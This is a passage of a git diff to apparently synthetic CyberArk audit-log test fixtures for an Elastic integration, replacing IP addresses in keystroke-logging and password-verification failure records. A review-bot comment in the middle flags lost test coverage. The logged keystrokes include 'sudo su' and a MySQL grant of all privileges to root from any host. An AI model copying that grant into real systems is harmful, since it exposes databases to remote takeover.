su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=7T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T14:11:18Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:11:18\n 2021-03-15T14:11:18Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=8T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:11:18","IsoTimestamp":"2021-03-15T14:11:18Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo 
su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=8T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} +<5>1 2021-03-15T14:45:51Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:45:51\n 2021-03-15T14:45:51Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n Command=(reverse-i-search)`grant': grant all privileges on *.* TO 'root'@'%' with grant option\\;;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;SSHOffset=296291B;User=testark;VIDOffset=2081T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:45:51","IsoTimestamp":"2021-03-15T14:45:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke 
logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=(reverse-i-search)`grant': grant all privileges on *.* TO 'root'@'%' with grant option\\;;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;SSHOffset=296291B;User=testark;VIDOffset=2081T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615819476"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/38_cpm_verify_password_failed.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/38_cpm_verify_password_failed.log index 211d487b613..29e2a66545c 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/38_cpm_verify_password_failed.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/38_cpm_verify_password_failed.log 
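Review bot: The rewritten records in this hunk collapse two previously distinct addresses into one value — the old `DstHost`/`Address` (34.123.103.115) and the old `Station` (34.71.250.247) both become `67.43.156.15` — so the keystroke-logging fixture no longer contains a sample where the PSM station differs from the target host. A pipeline test driven by this file would therefore not detect a regression in which `Station` and `DstHost`/`Address` are mapped onto the same ECS field, something the old data would have caught. Keeping a second address from the same test range for `Station` (for example `67.43.156.16`, constructed here; the update-owner hunk above already keeps one record distinct with `67.43.156.14`) would preserve that coverage. The `SrcHost` substitution to `67.43.156.13` is applied consistently between the `raw` payload and the parsed `ExtraDetails` on every changed line, which the pipeline expected-output file (not visible in this chunk) presumably depends on.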
@@ -1,8 +1,8 @@ -<7>1 2021-03-15T13:19:58Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:19:58\n 2021-03-15T13:19:58Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n\n address=34.66.114.180;username=ELASTIC\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:19:58","IsoTimestamp":"2021-03-15T13:19:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
\n","ExtraDetails":"address=34.66.114.180;username=ELASTIC\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814397"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 34.66.114.180\\ELASTIC\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-15T13:25:32Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:25:32\n 2021-03-15T13:25:32Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The network name cannot be found. (winRc=67). 
\n\n address=34.66.114.180;username=bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:25:32","IsoTimestamp":"2021-03-15T13:25:32Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The network name cannot be found. (winRc=67). \n","ExtraDetails":"address=34.66.114.180;username=bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814709"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"UserDN","Value":"ELASTIC.local"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 34.66.114.180\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The network name cannot be found. (winRc=67). 
"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-15T13:33:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:33:26\n 2021-03-15T13:33:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n\n address=34.66.114.180;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:33:26","IsoTimestamp":"2021-03-15T13:33:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
\n","ExtraDetails":"address=34.66.114.180;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615815206"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-15T15:04:11Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 08:04:11\n 2021-03-15T15:04:11Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
\n\n address=34.66.114.180;retriescount=1;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 08:04:11","IsoTimestamp":"2021-03-15T15:04:11Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=34.66.114.180;retriescount=1;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615820651"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-15T16:35:01Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 09:35:01\n 2021-03-15T16:35:01Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n\n address=34.66.114.180;retriescount=2;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 09:35:01","IsoTimestamp":"2021-03-15T16:35:01Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
\n","ExtraDetails":"address=34.66.114.180;retriescount=2;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"2"},{"Name":"LastFailDate","Value":"1615826099"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T13:19:58Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:19:58\n 2021-03-15T13:19:58Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\n\n address=67.43.156.15;username=ELASTIC\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:19:58","IsoTimestamp":"2021-03-15T13:19:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=67.43.156.15;username=ELASTIC\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814397"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 67.43.156.15\\ELASTIC\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T13:25:32Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:25:32\n 2021-03-15T13:25:32Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The network name cannot be found. (winRc=67). \n\n address=67.43.156.15;username=bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:25:32","IsoTimestamp":"2021-03-15T13:25:32Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The network name cannot be found. (winRc=67). 
\n","ExtraDetails":"address=67.43.156.15;username=bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814709"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"UserDN","Value":"ELASTIC.local"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 67.43.156.15\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The network name cannot be found. (winRc=67). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T13:33:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:33:26\n 2021-03-15T13:33:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\n\n address=67.43.156.15;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:33:26","IsoTimestamp":"2021-03-15T13:33:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=67.43.156.15;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615815206"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T15:04:11Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 08:04:11\n 2021-03-15T15:04:11Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n\n address=67.43.156.15;retriescount=1;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 08:04:11","IsoTimestamp":"2021-03-15T15:04:11Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
